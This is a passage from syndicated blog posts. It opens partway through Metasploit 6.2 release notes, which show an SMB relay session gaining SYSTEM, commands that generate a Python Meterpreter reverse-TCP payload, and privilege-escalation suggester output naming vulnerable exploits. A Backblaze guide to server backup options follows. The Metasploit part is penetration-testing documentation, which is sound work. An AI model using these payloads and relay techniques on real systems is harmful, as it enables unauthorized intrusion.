[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000

A session will be opened on the relay target with the associated credentials:

msf6 exploit(windows/smb/smb_relay) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R  192.168.123.1:4444 -> 192.168.123.4:52771  (192.168.123.4)

Further details can be found in the Metasploit SMB Relay documentation.

Improved pivoting / NATed services support

Metasploit has added features to libraries that provide listening services (like HTTP, FTP, LDAP, etc) to allow them to be bound to an explicit IP address and port combination that is independent of what is typically the SRVHOST option. This is particularly useful for modules that may be used in scenarios where the target needs to connect to Metasploit through either a NAT or port-forward configuration. The use of this feature mimics the existing functionality that’s provided by the reverse_tcp and reverse_http(s) payload stagers.

When a user needs the target to connect to 10.2.3.4, the Metasploit user would set that as the SRVHOST. If, however, that IP address is the external interface of a router with a port forward, Metasploit won’t be able to bind to it. To fix that, users can now set the ListenerBindAddress option to one that Metasploit can listen on — in this case, the IP address that the router will forward the incoming connection to.

For example, with the network configuration:

Private IP: 172.31.21.26 (where Metasploit can bind to)
External IP: 10.2.3.4 (where the target connects to Metasploit)

The Metasploit module commands would be:

# Set where the target connects to Metasploit. ListenerBindAddress is a new option.
set srvhost 10.2.3.4
set ListenerBindAddress 172.31.21.26

# Set where Metasploit will bind to. ReverseListenerBindAddress is an existing option.
set lhost 10.2.3.4
set ReverseListenerBindAddress 172.31.21.26

Debugging Meterpreter sessions

There are now two ways to debug Meterpreter sessions:

  1. Log all networking requests and responses between msfconsole and Meterpreter, i.e. TLV packets
  2. Generate a custom Meterpreter debug build with extra logging present

Log Meterpreter TLV packets

This can be enabled for any Meterpreter session and does not require a special debug Metasploit build:

msf6 > setg SessionTlvLogging true
SessionTlvLogging => true

Here’s an example of logging the network traffic when running the getenv Meterpreter command:

meterpreter > getenv USER

SEND: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1052 command=stdapi_sys_config_getenv>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="73717259684850511890564936718272">
  #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE    meta=STRING     value="USER">
]>

RECV: #<Rex::Post::Meterpreter::Packet type=Response        tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=UUID            meta=RAW        value="Q\xE63_onC\x9E\xD71\xDE3\xB5Q\xE24">
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=1052 command=stdapi_sys_config_getenv>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="73717259684850511890564936718272">
  #<Rex::Post::Meterpreter::Tlv type=RESULT          meta=INT        value=0>
  #<Rex::Post::Meterpreter::GroupTlv type=ENV_GROUP       tlvs=[
    #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE    meta=STRING     value="USER">
    #<Rex::Post::Meterpreter::Tlv type=ENV_VALUE       meta=STRING     value="demo_user">
  ]>
]>

Environment Variables
=====================

Variable  Value
--------  -----
USER      demo_user

Meterpreter debug builds

We have added options to Meterpreter payload generation for generating debug builds that include extra log statements. These payloads can be useful for debugging Meterpreter sessions, when developing new Meterpreter features, or for raising Metasploit issue reports. To choose a prebuilt Meterpreter payload with debug functionality present, set MeterpreterDebugBuild to true. There is also configuration support for writing the log output to stdout or to a file on the remote target by setting MeterpreterDebugLogging to rpath:/tmp/meterpreter_log.txt.

For example, within msfconsole you can generate a new payload and create a handler:

use payload/python/meterpreter_reverse_tcp
generate -o shell.py -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true MeterpreterTryToFork=false
to_handler

Running the payload will show the Meterpreter log output:

$ python3 shell.py
DEBUG:root:[*] running method core_negotiate_tlv_encryption
DEBUG:root:[*] Negotiating TLV encryption
DEBUG:root:[*] RSA key: 30820122300d06092a864886f70d01010105000382010f003082010a0282010100aa0f09225ff311d136b7c2ed02e5f4c819a924bd59a2ba67ea3e36c837c1d28ba97db085acad9374a543ad0709006d835c80aa273138948ec9ff699142405819e68b8dbc3c04300dc2a93a5be4be2263b69e8282447b6250abad8056de6e7f83b20c6151d72af63c908fa5b0c3ab3a4ac92d8b335a284b0542e3bf9ef10456024df2581b22f233a84e69d41d721aa00e23ba659c4420123d5fdd78ac061ffcb74e5ba60fece415c2be982df57d13afc107b8522dc462d08247e03d63b0d6aa639784e7187384c315147a7d18296f09495ba7969da01b1fb49097295792572a01acdaf7406f2ad5b25d767d8695cc6e33d33dfeeb158a6f50d43d07dd05aa19ff0203010001
DEBUG:root:[*] AES key: 0x121565e60770fccfc7422960bde14c12193baa605c4fdb5489d9bbd6b659f966
DEBUG:root:[*] Encrypted AES key: 0x741a972aa2e95260279dc658f4b611ca2039a310ebb834dee47342a5809a68090fed0a87497f617c2b04ecf8aa1d6253cda0a513ccb53b4acc91e89b95b198dce98a0908a4edd668ff51f2fa80f4e2c6bc0b5592248a239f9a7b30b9e53a260b92a3fdf4a07fe4ae6538dfc9fa497d02010ee67bcf29b38ec5a81d62da119947a60c5b35e8b08291825024c734b98c249ad352b116618489246aebd0583831cc40e31e1d8f26c99eb57d637a1984db4dc186f8df752138f798fb2025555802bd6aa0cebe944c1b57b9e01d2d9d81f99a8195222ef2f32de8dfbc150286c122abdc78f19246e5ad65d765c23ba762fe95182587bd738d95814a023d31903c2a46
DEBUG:root:[*] TLV encryption sorted
DEBUG:root:[*] sending response packet
DEBUG:root:[*] running method core_set_session_guid
DEBUG:root:[*] sending response packet
DEBUG:root:[*] running method core_enumextcmd
DEBUG:root:[*] sending response packet
DEBUG:root:[*] running method core_enumextcmd
DEBUG:root:[*] sending response packet
... etc ...

For full details, see the Debugging Meterpreter Sessions documentation.

User-contributable docs

We have now released user-contributable documentation for Metasploit, available at https://docs.metasploit.com/. This new site provides a searchable source of information for multiple topics including:

Contributions are welcome, and the Markdown files can now be found within the Metasploit framework repo, under the docs folder.

Local exploit suggester improvements

The post/multi/recon/local_exploit_suggester post module can be used to iterate through multiple relevant Metasploit modules and automatically check for local vulnerabilities that may lead to privilege escalation.

Now with Metasploit 6.2, this module has been updated with a number of bug fixes, as well as improved UX that more clearly highlights which modules are viable:

msf6 post(multi/recon/local_exploit_suggester) > run session=-1
... etc ...
[*] ::1 - Valid modules for session 3:
============================
 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                 Yes                      The target is vulnerable.
 2   exploit/linux/local/cve_2022_0847_dirtypipe                         Yes                      The target appears to be vulnerable. Linux kernel version found: 5.14.0
 3   exploit/linux/local/cve_2022_0995_watch_queue                       Yes                      The target appears to be vulnerable.
 4   exploit/linux/local/desktop_privilege_escalation                    Yes                      The target is vulnerable.
 5   exploit/linux/local/network_manager_vpnc_username_priv_esc          Yes                      The service is running, but could not be validated.
 6   exploit/linux/local/pkexec                                          Yes                      The service is running, but could not be validated.
 7   exploit/linux/local/polkit_dbus_auth_bypass                         Yes                      The service is running, but could not be validated. Detected polkit framework version 0.105.
 8   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.
 9   exploit/android/local/futex_requeue                                 No                       The check raised an exception.
 10  exploit/linux/local/abrt_raceabrt_priv_esc                          No                       The target is not exploitable.
 11  exploit/linux/local/abrt_sosreport_priv_esc                         No                       The target is not exploitable.
 12  exploit/linux/local/af_packet_chocobo_root_priv_esc                 No                       The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable
 13  exploit/linux/local/af_packet_packet_set_ring_priv_esc              No                       The target is not exploitable.
 14  exploit/linux/local/apport_abrt_chroot_priv_esc                     No                       The target is not exploitable.
 15  exploit/linux/local/asan_suid_executable_priv_esc                   No                       The check raised an exception.
 16  exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc          No                       The target is not exploitable.

Setting the option verbose=true will now also highlight modules that weren’t considered as part of the module suggestion phase due to session platform/arch/type mismatches. This is useful for evaluating modules that may require manually migrating from a shell session to Meterpreter, or from a Python Meterpreter to a native Meterpreter to gain local privilege escalation.

Upcoming roadmap work

In addition to the normal module development release cycle, the Metasploit team has now begun work on adding Kerberos authentication support as part of a planned Metasploit 6.3.0 release.

Get it

Existing Metasploit Framework users can update to the latest release of Metasploit Framework via the msfupdate command.

New users can either download the latest release through our nightly installers, or if you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest release.


Server Backup 101: Choosing a Server Backup Solution

Post Syndicated from Kari Rivas original https://www.backblaze.com/blog/server-backup-101-choosing-a-server-backup-solution/

If you’re in charge of backups for your company, you know backing up your server is a critical task to protect important business data from data disasters like fires, floods, and ransomware attacks. You also likely know that digital transformation is pushing innovation forward with server backup solutions that live in the cloud.

Whether you operate in the cloud, on-premises, or with a hybrid environment, finding a server backup solution that meets your needs helps you keep your data and your business safe and secure.

This guide explains the various server backup solutions available both on-premises and in the cloud, and how to choose the right backup solution for your needs.

On-premises Solutions for Server Backup

On-premises solutions store data on servers in an in-house data center managed and maintained internally. Although there has been a dramatic shift from on-premises to cloud server solutions, many organizations choose to operate their legacy systems on-premises alone or in conjunction with the cloud in a hybrid environment.

LTO/Tape

Linear tape-open (LTO) backup is the process of copying data from primary storage to a tape cartridge. If the hard disk crashes, the tapes will still hold a copy of the data.

Pros:

  • High capacity.
  • Tapes can last a long time.
  • Provides a physical air gap between backups and the network to protect against threats like ransomware.

Cons:

  • Up-front CapEx expense.
  • Tape drives must be monitored and maintained to ensure they are functioning properly.
  • Tapes take up lots of physical space.
  • Tape is susceptible to degradation over time.
  • The process of backing up to tape can be time consuming for high volumes of data.

NAS

Network-attached storage (NAS) enables multiple users and devices to store and back up data through a secure server. Anyone connected to a LAN can access the storage through a browser-based utility. It’s essentially an extra network strictly for storing data that users can access via its attached network device.

Pros:

  • Faster to restore files and access backups than tape backups.
  • More digitally intuitive and straightforward to navigate.
  • Comes with built-in backup and sync features.
  • Can connect and back up multiple computers and endpoints via the network.

Cons:

  • Requires physical maintenance and periodic drive replacement.
  • Each appliance has a limited storage capacity.
  • Because it’s connected to your network, it is also vulnerable to network attacks.

Local Server Backup

Putting your backup files on the same server or a storage server is not recommended for business applications. Still, many people choose to organize their backup storage on the same server the data runs on.

Pros:

  • Highly local.
  • Quick and easy to access.

Cons:

  • Generally less secure.
  • Capacity-limited.
  • Susceptible to malware, ransomware, and viruses.

Beyond these specific backup destinations, there are some pros to using on-premises backup solutions in general. For example, you might still be able to access backup files without an internet connection, and you can expect a fast restore if you have large amounts of data to recover.

However, all on-premises backup storage solutions are vulnerable to natural disasters, fires, and water damage despite your best efforts. While some methods like tape are naturally air-gapped, solutions like NAS are not. Even with a layered approach to data protection, NAS leaves a business susceptible to attacks.

Backing Up to Cloud Storage

Many organizations choose a cloud-based server for backup storage instead of or in addition to an on-premises solution (more on using both on-premises and cloud solutions together later) as they continue to integrate modern digital tools. While an on-premises system refers to data hardware and physical storage solutions, cloud storage lives “in the cloud.”

A cloud server is a virtual server that is hosted in a cloud provider’s data center. “The cloud” refers to the virtual servers users access through web browsers, APIs, CLIs, and SaaS applications and the databases that run on the servers themselves.

Because cloud providers manage the server’s physical location and hardware, organizations aren’t responsible for managing costly data centers. Even small businesses that can’t afford internal infrastructure can outsource data management, backup, and cloud storage from providers.

Pros

  • Highly scalable since companies can add as much storage as needed without ever running out of space.
  • Typically far less expensive than on-premises backup solutions because there’s no need to pay for dedicated IT staff, hardware upgrades or repair, or the space and electricity needed to run an on-premises system.
  • Builds resilience from natural disasters with off-site storage.
  • Virtual air-gapped protection may be available.
  • Fast recovery times in most cases.

Cons

  • Cloud storage fees can add up depending on the amount of storage your organization requires and the company you choose. Things like egress fees, minimum retention policies, and complicated pricing tiers can cause headaches later, so much so that there are companies dedicated to helping you decipher your AWS bill, for example.
  • Can require high bandwidth for initial deployment, however solutions like Universal Data Migration are making deployment and migrations easier.
  • Since backups can be accessed via API, they can be vulnerable to attacks without a feature like Object Lock.

It can be tough to choose between cloud storage vs. on-premises storage for backing up critical data. Many companies choose a hybrid cloud backup solution that involves both on-premises and cloud storage backup processes. Cloud backup providers often work with companies that want to build a hybrid cloud environment to run business applications and store data backups in case of a cyber attack, natural disaster, or hardware failure.

If you’re stuck between choosing an on-premises or cloud storage backup solution, a hybrid cloud option might be a good fit.

A hybrid cloud strategy combines a private, typically on-premises, cloud with a public cloud.

All-in-one vs. Integrated Solutions

When it comes to cloud backup solutions, there are two main types: all-in-one and integrated solutions.

Let’s talk about the differences between the two:

All-in-one Tools

All-in-one tools are cloud backup solutions that include both the backup application software and the cloud storage where backups will be stored. Instead of purchasing multiple products and deploying them separately, all-in-one tools allow users to deploy cloud storage with backup features together.

Pros:

  • No need for additional software.
  • Simple, out-of-the-box deployment.
  • Creates a seamless native environment.

Cons:

  • Some all-in-one tools sacrifice granularity for convenience, meaning they may not fit every use case.
  • They can be more costly than pairing cloud storage with backup software.

Integrated Solutions

Integrated solutions are pure cloud storage providers that offer cloud storage infrastructure without built-in backup software. An integrated solution means that organizations have to bring their own backup application that integrates with their chosen cloud provider.

Pros:

  • Mix and match your cloud storage and backup vendors to create a tailored server backup solution.
  • More control over your environment.
  • More control over your spending.

Cons:

  • Requires identifying and contracting with more than one provider.
  • Can require more technical expertise than with an all-in-one solution, but many cloud storage providers and backup software providers have existing integrations to make onboarding seamless.

How to Choose a Cloud Storage Solution

Choosing the best cloud storage solution for your organization involves careful consideration. There are several types of solutions available, each with unique capabilities. You don’t need the most expensive solution with bells and whistles. All you need to do is find the solution that fits your business model and future goals.

However, there are five main features that every organization seeking object storage in the cloud should look out for:

Cost

Cost is always a top concern for adopting new processes and tools in any business setting. Before choosing a cloud storage solution, take note of any fees or file size requirements for retention, egress, and data retrieval. Costs can vary significantly between storage providers, so be sure to check pricing details.

Ease-of-use and Onboarding Support

Adopting a new digital tool may also require a bit of a learning curve. Choosing a solution that supports your OS and is easy to use can help speed up the adoption rate. Check to see if there are data transfer options or services that can help you migrate more effectively. Not only should cloud storage be simple to use, but easy to deploy as well.

Security and Recovery Capabilities

Most object storage cloud solutions come with security and recovery capabilities. For example, you may be looking for a provider with Object Lock capabilities to protect data from ransomware or a simple way to implement disaster recovery protocols with a single command. Otherwise, you should check if the security specs meet your needs.
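
For instance, with a provider that supports Object Lock through the S3 API, a backup object can be locked against deletion for a retention period. This is a hedged sketch, not provider-specific guidance: the endpoint, bucket, key, and date are placeholders, and the bucket must have been created with Object Lock enabled.

import boto3
from datetime import datetime, timezone

s3 = boto3.client("s3", endpoint_url="https://<s3-compatible-endpoint>")  # placeholder

# Prevent the backup object from being deleted or overwritten until the date below.
s3.put_object_retention(
    Bucket="my-server-backups",          # placeholder
    Key="backup-2022-06-09.tar.gz",      # placeholder
    Retention={
        "Mode": "COMPLIANCE",
        "RetainUntilDate": datetime(2022, 12, 31, tzinfo=timezone.utc),
    },
)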

Integrations

All organizations seeking cloud storage solutions need to make sure that they choose a compatible solution with their existing systems and software. For example, if your applications speak the S3 API language, your storage systems must also speak the same language.

Many organizations use software-based backup tools to get things done. To take advantage of the benefits of cloud storage, these digital tools should also integrate with your storage solution. Popular backup solutions such as MSP360 and Veeam are built with native integrations for ease of use.
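
As a quick example of what S3 compatibility means in practice: if your backup tooling already speaks the S3 API, pointing it at a compatible provider is typically just a matter of supplying that provider's endpoint and keys. The endpoint and credentials below are placeholders; consult your provider's documentation for the real values.

import boto3

s3 = boto3.client(
    "s3",
    endpoint_url="https://<s3-compatible-endpoint>",  # placeholder
    aws_access_key_id="<application-key-id>",         # placeholder
    aws_secret_access_key="<application-key>",        # placeholder
)

# Upload a server backup archive to a bucket on the S3-compatible provider.
s3.upload_file("backup-2022-06-09.tar.gz", "my-server-backups", "backup-2022-06-09.tar.gz")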

Support Models

The level of support you want and need should factor into your decision-making when choosing a cloud provider. If you know your team needs fast access to support personnel, make sure the cloud provider you choose offers a support SLA or the opportunity to purchase elevated levels of support.

Questions to Ask Before Deciding on a Cloud Storage Solution

Of course, there are other considerations to take into account. For example, managed service providers will likely need a cloud storage solution to manage multiple servers. Small business owners may only need a set amount of storage for now but with the ability to easily scale with pay-as-you-go pricing as the business grows. IT professionals might be looking for a simplified interface and centralized management to make monitoring and reporting more efficient.

When comparing different cloud solutions for object storage, there are a few more questions to ask before making a purchase:

  • Is there a web-based admin console? A web-based admin console makes it easy to view backups from multiple servers. You can manage all your storage from one single location and download or recover files from anywhere in the world with a network connection.
  • Are there multiple ways to interact with the storage? Does the provider offer different ways to access your data, for example, via a web console, APIs, CLI, etc.? If your infrastructure is configured to work with the S3 API, does the provider offer S3 compatibility?
  • Can you set retention? Some industries are more highly regulated than others. Consider whether your company needs a certain retention policy and ensure that your cloud storage provider doesn’t unnecessarily charge minimum file retention fees.
  • Is there native application support? A native environment can be helpful to back up an Exchange and SQL Server appropriately, especially for team members who are less experienced in cloud storage.
  • What types of restores does it offer? Another crucial factor to consider is how you can recover your data from cloud storage, if necessary.

Making a Buying Decision: The Intangibles

Lastly, don’t just consider the individual software and cloud storage solutions you’re buying. You should also consider the company you’re buying from. It’s worth doing your due diligence when vetting a cloud storage provider. Here are some areas to consider:

Stability

When it comes to crucial business data, you need to choose a company with a long-standing reputation for stability.

Data loss can happen if a not-so-well-known cloud provider suddenly goes down for good. And some lesser-known providers may not offer the same quality of uptime, storage, and other security and customer support options.

Find out how long the company has been providing cloud storage services, and do a little research to find out how popular its cloud services are.

Customers

Next, take a look at the organizations that use their cloud storage backup solutions. Do they work with companies similar to yours? Are there industry-specific features that can boost your business?

Choosing a cloud storage company that can provide the specs that your business requires plays an important role in the overall success of your organization. By looking at the other customers that a cloud storage company works with, you can better understand whether or not the solution will meet your needs.

Reviews

Online reviews are a great way to see how users respond to a cloud storage product’s features and benefits before trying it out yourself.

Many software review websites such as G2, Gartner Peer Insights, and Capterra offer a comprehensive overview of different cloud storage products and reviews from real customers. You can also take a look at the company’s website for case studies with companies like yours.

Values

Another area to investigate when choosing a cloud storage provider is the company values.

Organizations typically work with other companies that mirror their values and enhance their ability to put them into action. Choosing a cloud storage provider with the correct values can help you reach new clients. But choosing a provider with values that don’t align with your organization can turn customers away.

Many tech companies are proud of their values, so it’s easy to get a feel for what they stand for by checking out their social media feeds, about pages, and reviews from people who work there.

Continuous Improvement

An organization’s ability to improve over time shows resiliency, an eye for innovation, and the ability to deliver high-quality products to users like you. You can find out if a cloud storage provider has a good track record for improving and innovating their products by performing a search query for new products and features, new offerings, additional options, and industry recognition.

Keep each of the above factors in mind when choosing a server backup solution for your needs.

How Cloud Storage Can Protect Servers and Critical Business Data

Businesses have already made huge progress in moving to the cloud to enable digital transformations. Cloud-based solutions can help businesses modernize server backup solutions or adopt hybrid cloud strategies. To summarize, here are a few things to remember when considering a cloud storage solution for your server backup needs:

  • Understand the pros and cons of on-premises backup solutions and consider a hybrid cloud approach to storing backups.
  • Evaluate a provider’s cost, security offerings, integrations, and support structure.
  • Consider intangible factors like reputation, reviews, and values.

Have more questions about cloud storage or how to implement cloud backups for your server? Let us know in the comments. Ready to get started? Your first 10GB are free.
